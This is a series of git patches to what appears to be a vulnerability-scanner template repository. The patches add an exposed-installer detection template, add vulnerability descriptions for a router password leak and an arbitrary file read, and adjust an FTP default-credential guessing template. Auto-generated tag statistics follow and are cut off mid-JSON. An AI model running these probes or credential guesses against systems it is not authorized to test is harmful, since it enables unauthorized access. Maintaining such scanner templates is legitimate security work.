From 553772ab8afab83b9978ebd1e1034e8d4d4e7980 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 30 Sep 2021 23:49:10 +0700 Subject: [PATCH 01/54] Create skycaiji-install.yaml --- misconfiguration/skycaiji-install.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 misconfiguration/skycaiji-install.yaml diff --git a/misconfiguration/skycaiji-install.yaml b/misconfiguration/skycaiji-install.yaml new file mode 100644 index 0000000000..9154469449 --- /dev/null +++ b/misconfiguration/skycaiji-install.yaml @@ -0,0 +1,25 @@ +id: skycaiji-install + +info: + name: SkyCaiji Exposed Installation + author: pikpikcu + severity: high + tags: tech,skycaiji,storage + +requests: + - method: GET + path: + - '{{BaseURL}}/index.php?s=/install/index/index' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '蓝天采集器 SkyCaiji 安装' + - 'https://www.skycaiji.com' + condition: and + + - type: status + status: + - 200 From 0ed37945d6b703248e3a32f919790e55f9afc78f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 8 Oct 2021 12:06:44 +0530 Subject: [PATCH 02/54] Update skycaiji-install.yaml --- misconfiguration/skycaiji-install.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/misconfiguration/skycaiji-install.yaml b/misconfiguration/skycaiji-install.yaml index 9154469449..4edf4869d7 100644 --- a/misconfiguration/skycaiji-install.yaml +++ b/misconfiguration/skycaiji-install.yaml @@ -4,7 +4,7 @@ info: name: SkyCaiji Exposed Installation author: pikpikcu severity: high - tags: tech,skycaiji,storage + tags: tech,skycaiji,exposure,misconfig requests: - method: GET @@ -18,6 +18,7 @@ requests: words: - '蓝天采集器 SkyCaiji 安装' - 'https://www.skycaiji.com' + - '' condition: and - type: status From c1b42bcc55f74d684577a841e80d95d949ae4715 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 17 Oct 2021 15:50:52 +0300 Subject: [PATCH 03/54] Add description --- vulnerabilities/other/comtrend-password-exposure.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/comtrend-password-exposure.yaml b/vulnerabilities/other/comtrend-password-exposure.yaml index d45499f302..1764bf1d74 100644 --- a/vulnerabilities/other/comtrend-password-exposure.yaml +++ b/vulnerabilities/other/comtrend-password-exposure.yaml @@ -4,6 +4,7 @@ info: name: COMTREND ADSL Router CT-5367 C01_R12 - Remote Code Execution author: geeknik severity: high + description: A vulnerability in COMTREND ADSL Router allows remote authenticated users to execute arbitrary commands via the telnet interface, the password for this interface is leaked to unauthenticated users via the 'password.cgi' endpoint. reference: https://www.exploit-db.com/exploits/16275 tags: router,exposure,iot From 0fd1574fe272bf58198d918c8429a5a001571bad Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 17 Oct 2021 15:52:26 +0300 Subject: [PATCH 04/54] Add description --- vulnerabilities/other/ewebs-arbitrary-file-reading.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/ewebs-arbitrary-file-reading.yaml b/vulnerabilities/other/ewebs-arbitrary-file-reading.yaml index e83d14ce2c..60ae8e5789 100644 --- a/vulnerabilities/other/ewebs-arbitrary-file-reading.yaml +++ b/vulnerabilities/other/ewebs-arbitrary-file-reading.yaml @@ -4,6 +4,7 @@ info: name: EWEBS casmain.xgi arbitrary file reading vulnerability author: pikpikcu severity: high + description: A vulnerability in EWEBS's 'casmain.xgi' endpoint allows remote attackers to disclose the content of locally stored files via the 'Language_S' parameter. reference: http://wiki.peiqi.tech/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E6%9E%81%E9%80%9AEWEBS/%E6%9E%81%E9%80%9AEWEBS%20casmain.xgi%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html tags: ewebs,lfi From 087bbd22633e4646fd1270c4fc53bc72272fd810 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 17 Oct 2021 15:54:19 +0300 Subject: [PATCH 05/54] Add description --- vulnerabilities/other/homeautomation-v3-openredirect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/homeautomation-v3-openredirect.yaml b/vulnerabilities/other/homeautomation-v3-openredirect.yaml index 9388597d8d..d41f1c89fb 100644 --- a/vulnerabilities/other/homeautomation-v3-openredirect.yaml +++ b/vulnerabilities/other/homeautomation-v3-openredirect.yaml @@ -4,6 +4,7 @@ info: name: HomeAutomation v3.3.2 Open Redirect author: 0x_Akoko severity: medium + description: A vulnerability in the HomeAutomation product allows remote unauthenticated attackers to inject a redirect URL via the 'api.php' endpoint and the 'redirect' parameter. reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5559.php tags: iot,redirect From 6aeaf22c914665d2d2b033ce7d7bbe292805aacf Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 17 Oct 2021 21:40:07 +0530 Subject: [PATCH 06/54] Update ftp-weak-credentials.yaml --- network/ftp-weak-credentials.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/network/ftp-weak-credentials.yaml b/network/ftp-weak-credentials.yaml index d3d5380725..57eb4e53ac 100644 --- a/network/ftp-weak-credentials.yaml +++ b/network/ftp-weak-credentials.yaml @@ -14,6 +14,7 @@ network: - "{{Hostname}}:21" - "{{Hostname}}" + stop-at-first-match: true payloads: username: - admin @@ -32,4 +33,4 @@ network: matchers: - type: word words: - - "230" \ No newline at end of file + - "230 Login successful" From 5a0b62b8f574ffcc9fee72afa5b71b3ec4b7a141 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 17 Oct 2021 16:10:43 +0000 Subject: [PATCH 07/54] Auto Generated Templates Stats [Sun Oct 17 16:10:43 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1766 +++++++++++++++++++++--------------------- TOP-10.md | 12 +- 3 files changed, 890 insertions(+), 890 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 4bed7d43d2..b3ed1986da 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":827},{"name":"lfi","count":337},{"name":"panel","count":267},{"name":"xss","count":258},{"name":"wordpress","count":249},{"name":"exposure","count":239},{"name":"rce","count":212},{"name":"tech","count":195},{"name":"wp-plugin","count":172},{"name":"cve2020","count":164},{"name":"cve2021","count":155},{"name":"joomla","count":128},{"name":"cve2010","count":109},{"name":"cve2019","count":97},{"name":"config","count":95},{"name":"cve2018","count":88},{"name":"apache","count":73},{"name":"takeover","count":69},{"name":"default-login","count":68},{"name":"oob","count":68},{"name":"iot","count":68},{"name":"token","count":67},{"name":"token-spray","count":63},{"name":"cve2017","count":51},{"name":"file","count":50},{"name":"unauth","count":49},{"name":"network","count":43},{"name":"ssrf","count":41},{"name":"sqli","count":40},{"name":"","count":38},{"name":"redirect","count":37},{"name":"cve2016","count":37},{"name":"oracle","count":36},{"name":"logs","count":30},{"name":"google","count":30},{"name":"atlassian","count":28},{"name":"jira","count":28},{"name":"cve2015","count":28},{"name":"cisco","count":27},{"name":"listing","count":27},{"name":"cve2014","count":27},{"name":"generic","count":24},{"name":"auth-bypass","count":23},{"name":"misc","count":23},{"name":"disclosure","count":23},{"name":"router","count":21},{"name":"misconfig","count":20},{"name":"aem","count":19},{"name":"springboot","count":18},{"name":"cve2012","count":18},{"name":"sap","count":18},{"name":"debug","count":18},{"name":"php","count":16},{"name":"devops","count":15},{"name":"cve2011","count":15},{"name":"login","count":14},{"name":"struts","count":14},{"name":"weblogic","count":14},{"name":"aws","count":14},{"name":"cve2009","count":14},{"name":"fuzz","count":14},{"name":"dns","count":13},{"name":"android","count":13},{"name":"zoho","count":13},{"name":"adobe","count":13},{"name":"deserialization","count":13},{"name":"jenkins","count":12},{"name":"manageengine","count":12},{"name":"dlink","count":12},{"name":"wp-theme","count":12},{"name":"cve2013","count":11},{"name":"magento","count":11},{"name":"intrusive","count":10},{"name":"hp","count":10},{"name":"dell","count":10},{"name":"xxe","count":10},{"name":"kubernetes","count":9},{"name":"ftp","count":9},{"name":"vmware","count":9},{"name":"nginx","count":8},{"name":"backup","count":8},{"name":"cve2008","count":8},{"name":"ruijie","count":8},{"name":"fastjson","count":8},{"name":"cnvd","count":8},{"name":"rails","count":8},{"name":"ibm","count":8},{"name":"microsoft","count":8},{"name":"airflow","count":8},{"name":"gitlab","count":8},{"name":"scada","count":8},{"name":"coldfusion","count":7},{"name":"cms","count":7},{"name":"confluence","count":7},{"name":"files","count":7},{"name":"netgear","count":7},{"name":"api","count":6},{"name":"camera","count":6},{"name":"django","count":6},{"name":"citrix","count":6},{"name":"laravel","count":6},{"name":"jetty","count":6},{"name":"rconfig","count":6},{"name":"drupal","count":6},{"name":"nodejs","count":6},{"name":"docker","count":6},{"name":"lucee","count":6},{"name":"solr","count":6},{"name":"fileupload","count":6},{"name":"ssti","count":5},{"name":"tomcat","count":5},{"name":"circarlife","count":5},{"name":"phpmyadmin","count":5},{"name":"iis","count":5},{"name":"java","count":5},{"name":"crlf","count":5},{"name":"printer","count":5},{"name":"jolokia","count":5},{"name":"windows","count":5},{"name":"headless","count":5},{"name":"dedecms","count":5},{"name":"symantec","count":4},{"name":"traversal","count":4},{"name":"solarwinds","count":4},{"name":"zimbra","count":4},{"name":"webserver","count":4},{"name":"asp","count":4},{"name":"artifactory","count":4},{"name":"firmware","count":4},{"name":"git","count":4},{"name":"exchange","count":4},{"name":"thinkcmf","count":4},{"name":"moodle","count":4},{"name":"zabbix","count":4},{"name":"symfony","count":4},{"name":"amazon","count":4},{"name":"glpi","count":4},{"name":"thinkphp","count":4},{"name":"maps","count":4},{"name":"hongdian","count":4},{"name":"firebase","count":4},{"name":"strapi","count":4},{"name":"resin","count":4},{"name":"buffalo","count":4},{"name":"vpn","count":4},{"name":"proxy","count":4},{"name":"grafana","count":4},{"name":"fatpipe","count":4},{"name":"npm","count":4},{"name":"magmi","count":4},{"name":"wso2","count":4},{"name":"slack","count":4},{"name":"samsung","count":4},{"name":"rfi","count":4},{"name":"elastic","count":4},{"name":"vbulletin","count":3},{"name":"bitrix","count":3},{"name":"springcloud","count":3},{"name":"targa","count":3},{"name":"ssh","count":3},{"name":"fpd","count":3},{"name":"nexus","count":3},{"name":"kafka","count":3},{"name":"druid","count":3},{"name":"r-seenet","count":3},{"name":"cve2007","count":3},{"name":"fanruan","count":3},{"name":"backdoor","count":3},{"name":"telerik","count":3},{"name":"lfr","count":3},{"name":"microstrategy","count":3},{"name":"zhiyuan","count":3},{"name":"mail","count":3},{"name":"azure","count":3},{"name":"search","count":3},{"name":"injection","count":3},{"name":"exposures","count":3},{"name":"bigip","count":3},{"name":"prometheus","count":3},{"name":"ofbiz","count":3},{"name":"jeesns","count":3},{"name":"httpd","count":3},{"name":"terramaster","count":3},{"name":"ebs","count":3},{"name":"caucho","count":3},{"name":"github","count":3},{"name":"cloud","count":3},{"name":"mongodb","count":3},{"name":"kibana","count":3},{"name":"nacos","count":3},{"name":"nosqli","count":3},{"name":"node","count":3},{"name":"hoteldruid","count":3},{"name":"itop","count":3},{"name":"jellyfin","count":3},{"name":"log","count":3},{"name":"linkerd","count":3},{"name":"opensis","count":3},{"name":"openssh","count":3},{"name":"kevinlab","count":3},{"name":"openam","count":3},{"name":"oa","count":3},{"name":"cves","count":3},{"name":"smtp","count":3},{"name":"tikiwiki","count":3},{"name":"lansweeper","count":3},{"name":"cacti","count":3},{"name":"paloalto","count":2},{"name":"ec2","count":2},{"name":"mailchimp","count":2},{"name":"huawei","count":2},{"name":"cve2005","count":2},{"name":"enumeration","count":2},{"name":"dos","count":2},{"name":"openfire","count":2},{"name":"nextcloud","count":2},{"name":"grav","count":2},{"name":"igs","count":2},{"name":"nextjs","count":2},{"name":"bucket","count":2},{"name":"couchdb","count":2},{"name":"maian","count":2},{"name":"qihang","count":2},{"name":"smb","count":2},{"name":"horde","count":2},{"name":"shellshock","count":2},{"name":"waf","count":2},{"name":"s3","count":2},{"name":"status","count":2},{"name":"geowebserver","count":2},{"name":"aviatrix","count":2},{"name":"hostheader-injection","count":2},{"name":"backups","count":2},{"name":"spark","count":2},{"name":"commax","count":2},{"name":"activemq","count":2},{"name":"linux","count":2},{"name":"liferay","count":2},{"name":"jsf","count":2},{"name":"jboss","count":2},{"name":"yapi","count":2},{"name":"ecoa","count":2},{"name":"lotus","count":2},{"name":"akkadian","count":2},{"name":"text","count":2},{"name":"seeyon","count":2},{"name":"avantfax","count":2},{"name":"pega","count":2},{"name":"db","count":2},{"name":"justwriting","count":2},{"name":"adminer","count":2},{"name":"kentico","count":2},{"name":"bruteforce","count":2},{"name":"rockmongo","count":2},{"name":"ucmdb","count":2},{"name":"plesk","count":2},{"name":"places","count":2},{"name":"sonicwall","count":2},{"name":"sitecore","count":2},{"name":"wordfence","count":2},{"name":"prtg","count":2},{"name":"netis","count":2},{"name":"globalprotect","count":2},{"name":"dolibarr","count":2},{"name":"prestashop","count":2},{"name":"upload","count":2},{"name":"mida","count":2},{"name":"chiyu","count":2},{"name":"frp","count":2},{"name":"payara","count":2},{"name":"keycloak","count":2},{"name":"harbor","count":2},{"name":"fortios","count":2},{"name":"icewarp","count":2},{"name":"emerge","count":2},{"name":"minio","count":2},{"name":"trixbox","count":2},{"name":"ilo","count":2},{"name":"vcenter","count":2},{"name":"heroku","count":2},{"name":"guacamole","count":2},{"name":"kong","count":2},{"name":"hpe","count":2},{"name":"natshell","count":2},{"name":"totemomail","count":2},{"name":"aruba","count":2},{"name":"ecology","count":2},{"name":"service","count":2},{"name":"yii","count":2},{"name":"akamai","count":2},{"name":"hashicorp","count":2},{"name":"chamilo","count":2},{"name":"nagios","count":2},{"name":"xxljob","count":2},{"name":"axis","count":2},{"name":"bitly","count":2},{"name":"mcafee","count":2},{"name":"netsweeper","count":2},{"name":"axis2","count":2},{"name":"sharepoint","count":2},{"name":"splunk","count":2},{"name":"vrealize","count":2},{"name":"hjtcloud","count":2},{"name":"idrac","count":2},{"name":"rancher","count":2},{"name":"leak","count":2},{"name":"qcubed","count":2},{"name":"glassfish","count":2},{"name":"chyrp","count":2},{"name":"voipmonitor","count":2},{"name":"embed","count":2},{"name":"phpcollab","count":2},{"name":"electron","count":2},{"name":"bypass","count":2},{"name":"rstudio","count":2},{"name":"storage","count":2},{"name":"tidb","count":2},{"name":"odoo","count":2},{"name":"cache","count":2},{"name":"favicon","count":2},{"name":"sonarqube","count":2},{"name":"saltstack","count":2},{"name":"wuzhicms","count":2},{"name":"flir","count":2},{"name":"getsimple","count":2},{"name":"jeedom","count":2},{"name":"oauth","count":2},{"name":"showdoc","count":2},{"name":"hasura","count":2},{"name":"openvpn","count":2},{"name":"webcam","count":2},{"name":"middleware","count":2},{"name":"wmt","count":1},{"name":"route","count":1},{"name":"office365","count":1},{"name":"shoretel","count":1},{"name":"hiawatha","count":1},{"name":"blue-ocean","count":1},{"name":"openrestry","count":1},{"name":"fiori","count":1},{"name":"playable","count":1},{"name":"acme","count":1},{"name":"sangfor","count":1},{"name":"cockpit","count":1},{"name":"jitsi","count":1},{"name":"wazuh","count":1},{"name":"extractor","count":1},{"name":"node-red-dashboard","count":1},{"name":"graphql","count":1},{"name":"iceflow","count":1},{"name":"nsasg","count":1},{"name":"karel","count":1},{"name":"nedi","count":1},{"name":"mdb","count":1},{"name":"selea","count":1},{"name":"mariadb","count":1},{"name":"sidekiq","count":1},{"name":"redis","count":1},{"name":"messaging","count":1},{"name":"openemr","count":1},{"name":"cve202","count":1},{"name":"episerver","count":1},{"name":"aura","count":1},{"name":"netmask","count":1},{"name":"mongo","count":1},{"name":"adb","count":1},{"name":"starttls","count":1},{"name":"huijietong","count":1},{"name":"gilacms","count":1},{"name":"resourcespace","count":1},{"name":"razor","count":1},{"name":"adiscon","count":1},{"name":"wifisky","count":1},{"name":"feifeicms","count":1},{"name":"spotify","count":1},{"name":"yealink","count":1},{"name":"rdp","count":1},{"name":"jfrog","count":1},{"name":"oscommerce","count":1},{"name":"interlib","count":1},{"name":"landrayoa","count":1},{"name":"testrail","count":1},{"name":"ecom","count":1},{"name":"discord","count":1},{"name":"traefik","count":1},{"name":"circontrorl","count":1},{"name":"dompdf","count":1},{"name":"manager","count":1},{"name":"tamronos","count":1},{"name":"opentsdb","count":1},{"name":"meraki","count":1},{"name":"stripe","count":1},{"name":"plc","count":1},{"name":"trane","count":1},{"name":"weglot","count":1},{"name":"blackboard","count":1},{"name":"tieline","count":1},{"name":"centos","count":1},{"name":"tongda","count":1},{"name":"comodo","count":1},{"name":"gsoap","count":1},{"name":"ems","count":1},{"name":"mara","count":1},{"name":"avalanche","count":1},{"name":"redmine","count":1},{"name":"concrete","count":1},{"name":"expose","count":1},{"name":"darkstat","count":1},{"name":"elascticsearch","count":1},{"name":"linkedin","count":1},{"name":"panos","count":1},{"name":"iptime","count":1},{"name":"hubspot","count":1},{"name":"deviantart","count":1},{"name":"bing","count":1},{"name":"dotnet","count":1},{"name":"klog","count":1},{"name":"circleci","count":1},{"name":"streetview","count":1},{"name":"visualstudio","count":1},{"name":"graphite","count":1},{"name":"woocommerce","count":1},{"name":"exacqvision","count":1},{"name":"find","count":1},{"name":"tika","count":1},{"name":"jenzabar","count":1},{"name":"details","count":1},{"name":"flink","count":1},{"name":"fuelcms","count":1},{"name":"travis","count":1},{"name":"bedita","count":1},{"name":"spf","count":1},{"name":"solarlog","count":1},{"name":"cve2006","count":1},{"name":"stem","count":1},{"name":"fcm","count":1},{"name":"minimouse","count":1},{"name":"phpunit","count":1},{"name":"square","count":1},{"name":"mirai","count":1},{"name":"ilo4","count":1},{"name":"openx","count":1},{"name":"cerebro","count":1},{"name":"emby","count":1},{"name":"smi","count":1},{"name":"azkaban","count":1},{"name":"svn","count":1},{"name":"zookeeper","count":1},{"name":"zte","count":1},{"name":"proftpd","count":1},{"name":"spidercontrol","count":1},{"name":"etouch","count":1},{"name":"xampp","count":1},{"name":"mkdocs","count":1},{"name":"ricoh","count":1},{"name":"listserv","count":1},{"name":"finereport","count":1},{"name":"tensorboard","count":1},{"name":"vscode","count":1},{"name":"shiro","count":1},{"name":"email","count":1},{"name":"diris","count":1},{"name":"zeroshell","count":1},{"name":"zarafa","count":1},{"name":"package","count":1},{"name":"alerta","count":1},{"name":"aspnuke","count":1},{"name":"artica","count":1},{"name":"default","count":1},{"name":"tjws","count":1},{"name":"rockethchat","count":1},{"name":"cse","count":1},{"name":"labtech","count":1},{"name":"netgenie","count":1},{"name":"kafdrop","count":1},{"name":"totaljs","count":1},{"name":" default-login","count":1},{"name":"csrf","count":1},{"name":"codemeter","count":1},{"name":"glowroot","count":1},{"name":"wiki","count":1},{"name":"qdpm","count":1},{"name":"commscope","count":1},{"name":"jnoj","count":1},{"name":"scs","count":1},{"name":"auth","count":1},{"name":"szhe","count":1},{"name":"plugin","count":1},{"name":"maccmsv10","count":1},{"name":"luftguitar","count":1},{"name":"lg-nas","count":1},{"name":"codeigniter","count":1},{"name":"triconsole","count":1},{"name":"sophos","count":1},{"name":"dotnetnuke","count":1},{"name":"sql","count":1},{"name":"mrtg","count":1},{"name":"soar","count":1},{"name":"yachtcontrol","count":1},{"name":"wondercms","count":1},{"name":"cves2001","count":1},{"name":"geolocation","count":1},{"name":"emc","count":1},{"name":"dom","count":1},{"name":"erp-nc","count":1},{"name":"ambari","count":1},{"name":"krweb","count":1},{"name":"floc","count":1},{"name":"dvr","count":1},{"name":"directions","count":1},{"name":"dnssec","count":1},{"name":"keenetic","count":1},{"name":"plone","count":1},{"name":"ssltls","count":1},{"name":"weather","count":1},{"name":"hiboss","count":1},{"name":"jmx","count":1},{"name":"contentkeeper","count":1},{"name":"centreon","count":1},{"name":"ns","count":1},{"name":"panasonic","count":1},{"name":"calendarix","count":1},{"name":"crm","count":1},{"name":"optiLink","count":1},{"name":"esmtp","count":1},{"name":"zenario","count":1},{"name":"owasp","count":1},{"name":"geocode","count":1},{"name":"k8s","count":1},{"name":"moin","count":1},{"name":"graylog","count":1},{"name":"opm","count":1},{"name":"exponentcms","count":1},{"name":"domxss","count":1},{"name":"metinfo","count":1},{"name":"ulterius","count":1},{"name":"zcms","count":1},{"name":"pulsesecure","count":1},{"name":"panabit","count":1},{"name":"viewpoint","count":1},{"name":"cors","count":1},{"name":"rocketchat","count":1},{"name":"qvisdvr","count":1},{"name":"pagespeed","count":1},{"name":"visionhub","count":1},{"name":"timeclock","count":1},{"name":"grails","count":1},{"name":"lokalise","count":1},{"name":"roads","count":1},{"name":"timezone","count":1},{"name":"clusterengine","count":1},{"name":"phpwiki","count":1},{"name":"fortinet","count":1},{"name":"pivotaltracker","count":1},{"name":"metabase","count":1},{"name":"idemia","count":1},{"name":"place","count":1},{"name":"acontent","count":1},{"name":"twitter","count":1},{"name":"miscrsoft","count":1},{"name":"nuuo","count":1},{"name":"monitorr","count":1},{"name":"bingmaps","count":1},{"name":"smartblog","count":1},{"name":"javascript","count":1},{"name":"zm","count":1},{"name":"blind","count":1},{"name":"tcexam","count":1},{"name":"sureline","count":1},{"name":"gotmls","count":1},{"name":"buildkite","count":1},{"name":"limit","count":1},{"name":"distance","count":1},{"name":"doh","count":1},{"name":"netrc","count":1},{"name":"trilithic","count":1},{"name":"landray","count":1},{"name":"lotuscms","count":1},{"name":"hortonworks","count":1},{"name":"wooyun","count":1},{"name":"gateone","count":1},{"name":"shopxo","count":1},{"name":"seacms","count":1},{"name":"dbeaver","count":1},{"name":"pyramid","count":1},{"name":"sendgrid","count":1},{"name":"dvwa","count":1},{"name":"websvn","count":1},{"name":"iterable","count":1},{"name":"jaspersoft","count":1},{"name":"fortigate","count":1},{"name":"circontrol","count":1},{"name":"javamelody","count":1},{"name":"sourcebans","count":1},{"name":"arl","count":1},{"name":"beanstalk","count":1},{"name":"sage","count":1},{"name":"solman","count":1},{"name":"netdata","count":1},{"name":"shopware","count":1},{"name":"flexbe","count":1},{"name":"syslog","count":1},{"name":"cscart","count":1},{"name":"cofax","count":1},{"name":"bazarr","count":1},{"name":"redhat","count":1},{"name":"froxlor","count":1},{"name":"gurock","count":1},{"name":"apiman","count":1},{"name":"apos","count":1},{"name":"gridx","count":1},{"name":"thinkadmin","count":1},{"name":"okta","count":1},{"name":"moinmoin","count":1},{"name":"dotclear","count":1},{"name":"lighttpd","count":1},{"name":"elevation","count":1},{"name":"cloudinary","count":1},{"name":"yzmcms","count":1},{"name":"gitlist","count":1},{"name":"couchbase","count":1},{"name":"hadoop","count":1},{"name":"autocomplete","count":1},{"name":"ruckus","count":1},{"name":"jumpcloud","count":1},{"name":"tapestry","count":1},{"name":"rsyncd","count":1},{"name":"tinypng","count":1},{"name":"dropbox","count":1},{"name":"api-manager","count":1},{"name":"gitea","count":1},{"name":"terraform","count":1},{"name":"gstorage","count":1},{"name":"rabbitmq","count":1},{"name":"servicenow","count":1},{"name":"loganalyzer","count":1},{"name":"jquery","count":1},{"name":"influxdb","count":1},{"name":"swagger","count":1},{"name":"ssl","count":1},{"name":"webmin","count":1},{"name":"clockwatch","count":1},{"name":"drone","count":1},{"name":"clickhouse","count":1},{"name":"mautic","count":1},{"name":"memcached","count":1},{"name":"gunicorn","count":1},{"name":"sco","count":1},{"name":"beanshell","count":1},{"name":"fastapi","count":1},{"name":"phpshowtime","count":1},{"name":"alibaba","count":1},{"name":"bolt","count":1},{"name":"newrelic","count":1},{"name":"vsftpd","count":1},{"name":"asana","count":1},{"name":"instagram","count":1},{"name":"secmail","count":1},{"name":"lancom","count":1},{"name":"speed","count":1},{"name":"pacsone","count":1},{"name":"bigbluebutton","count":1},{"name":"raspap","count":1},{"name":"webftp","count":1},{"name":"myvuehelp","count":1},{"name":"svnserve","count":1},{"name":"sgp","count":1},{"name":"mysql","count":1},{"name":"magicflow","count":1},{"name":"rhymix","count":1},{"name":"csrfguard","count":1},{"name":"pihole","count":1},{"name":"embedthis","count":1},{"name":"springframework","count":1},{"name":"k8","count":1},{"name":"postmark","count":1},{"name":"glances","count":1},{"name":"announcekit","count":1},{"name":"anchorcms","count":1},{"name":"zmanda","count":1},{"name":"upnp","count":1},{"name":"csod","count":1},{"name":"mailgun","count":1},{"name":"myucms","count":1},{"name":"powercreator","count":1},{"name":"fortigates","count":1},{"name":"webui","count":1},{"name":"accela","count":1},{"name":"lutron","count":1},{"name":"appweb","count":1},{"name":"expn","count":1},{"name":"nuxeo","count":1},{"name":"oidc","count":1},{"name":"fedora","count":1},{"name":"cyberoam","count":1},{"name":"fortiweb","count":1},{"name":"nomad","count":1},{"name":"photo","count":1},{"name":"locations","count":1},{"name":"pmb","count":1},{"name":"smartsense","count":1},{"name":"empirecms","count":1},{"name":"opensns","count":1},{"name":"pcoip","count":1},{"name":"achecker","count":1},{"name":"tracer","count":1},{"name":"actuator","count":1},{"name":"phpinfo","count":1},{"name":"ipstack","count":1},{"name":"sarg","count":1},{"name":"okiko","count":1},{"name":"tileserver","count":1},{"name":"nerdgraph","count":1},{"name":"eyelock","count":1},{"name":"sprintful","count":1},{"name":"xunchi","count":1},{"name":"turbocrm","count":1},{"name":"lanproxy","count":1},{"name":"qsan","count":1},{"name":"etherpad","count":1},{"name":"openerp","count":1},{"name":"opencast","count":1},{"name":"ueditor","count":1},{"name":"basic-auth","count":1},{"name":"discourse","count":1},{"name":"cobub","count":1},{"name":"twitter-server","count":1},{"name":"bash","count":1},{"name":"wamp","count":1},{"name":"maxsite","count":1},{"name":"pendo","count":1},{"name":"xiuno","count":1},{"name":"xdcms","count":1},{"name":"mpsec","count":1},{"name":"chinaunicom","count":1},{"name":"shopizer","count":1},{"name":"ognl","count":1},{"name":"uwsgi","count":1},{"name":"pagerduty","count":1},{"name":"owa","count":1},{"name":"chevereto","count":1},{"name":"nc2","count":1},{"name":"clink-office","count":1},{"name":"tectuus","count":1},{"name":"database","count":1},{"name":"bookstack","count":1},{"name":"mantisbt","count":1},{"name":"mapbox","count":1},{"name":"webmodule-ee","count":1},{"name":"spring","count":1},{"name":"scimono","count":1},{"name":"viewlinc","count":1},{"name":"simplecrm","count":1},{"name":"imap","count":1},{"name":"sar2html","count":1},{"name":"cgi","count":1},{"name":"alertmanager","count":1},{"name":"ewebs","count":1},{"name":"daybyday","count":1},{"name":"cocoon","count":1},{"name":"nexusdb","count":1},{"name":"postgres","count":1},{"name":"ruby","count":1},{"name":"olivetti","count":1},{"name":"oneblog","count":1},{"name":"novnc","count":1},{"name":"werkzeug","count":1},{"name":"kerbynet","count":1},{"name":"rubedo","count":1},{"name":"spectracom","count":1},{"name":"axiom","count":1},{"name":"phpfusion","count":1},{"name":"calendly","count":1},{"name":"tor","count":1},{"name":"geutebruck","count":1},{"name":"tugboat","count":1},{"name":"wavlink","count":1},{"name":"realteo","count":1},{"name":"phalcon","count":1},{"name":"bullwark","count":1},{"name":"b2evolution","count":1},{"name":"remkon","count":1},{"name":"perl","count":1},{"name":"livezilla","count":1},{"name":"kindeditor","count":1},{"name":"faraday","count":1},{"name":"nweb2fax","count":1},{"name":"octoprint","count":1},{"name":"avtech","count":1},{"name":"robomongo","count":1},{"name":"redcap","count":1},{"name":"craftcms","count":1},{"name":"74cms","count":1},{"name":"checkpoint","count":1},{"name":"wing-ftp","count":1},{"name":"zzzcms","count":1},{"name":"jsp","count":1},{"name":"cloudron","count":1},{"name":"tpshop","count":1},{"name":"xmlchart","count":1},{"name":"st","count":1},{"name":"htmli","count":1},{"name":"salesforce","count":1},{"name":"ghost","count":1},{"name":"placeos","count":1},{"name":"gloo","count":1},{"name":"visualtools","count":1},{"name":"ioncube","count":1},{"name":"setup","count":1},{"name":"saltapi","count":1},{"name":"webadmin","count":1},{"name":"synnefo","count":1},{"name":"vnc","count":1},{"name":"sentry","count":1},{"name":"gespage","count":1},{"name":"omi","count":1},{"name":"argussurveillance","count":1},{"name":"skywalking","count":1},{"name":"mobileiron","count":1},{"name":"shoppable","count":1},{"name":"clave","count":1},{"name":"wildfly","count":1},{"name":"zms","count":1},{"name":"woocomernce","count":1},{"name":"logontracer","count":1},{"name":"ntopng","count":1},{"name":"elasticsearch","count":1},{"name":"parentlink","count":1},{"name":"kyan","count":1},{"name":"mantis","count":1},{"name":"mongoshake","count":1},{"name":"ganglia","count":1},{"name":"buttercms","count":1},{"name":"sceditor","count":1},{"name":"rmi","count":1},{"name":"zyxel","count":1},{"name":"nette","count":1},{"name":"fortilogger","count":1},{"name":"eg","count":1},{"name":"matrix","count":1},{"name":"jeewms","count":1},{"name":"plastic","count":1},{"name":"cherokee","count":1},{"name":"motorola","count":1},{"name":"javafaces","count":1},{"name":"nimble","count":1},{"name":"nps","count":1},{"name":"processmaker","count":1},{"name":"gogs","count":1},{"name":"sqlite","count":1},{"name":"jenkin","count":1},{"name":"wakatime","count":1},{"name":"key","count":1},{"name":"redwood","count":1},{"name":"kubeflow","count":1},{"name":"duomicms","count":1},{"name":"majordomo2","count":1},{"name":"geddy","count":1},{"name":"spip","count":1},{"name":"socomec","count":1},{"name":"varnish","count":1},{"name":"nordex","count":1},{"name":"zend","count":1},{"name":"weiphp","count":1},{"name":"asus","count":1},{"name":"camunda","count":1},{"name":"pippoint","count":1},{"name":"frontpage","count":1},{"name":"loqate","count":1},{"name":"nifi","count":1},{"name":"pgadmin","count":1},{"name":"nearby","count":1},{"name":"biometrics","count":1},{"name":"openweather","count":1},{"name":"fastcgi","count":1},{"name":"phpfastcache","count":1},{"name":"subrion","count":1},{"name":"haproxy","count":1},{"name":"graph","count":1},{"name":"octobercms","count":1},{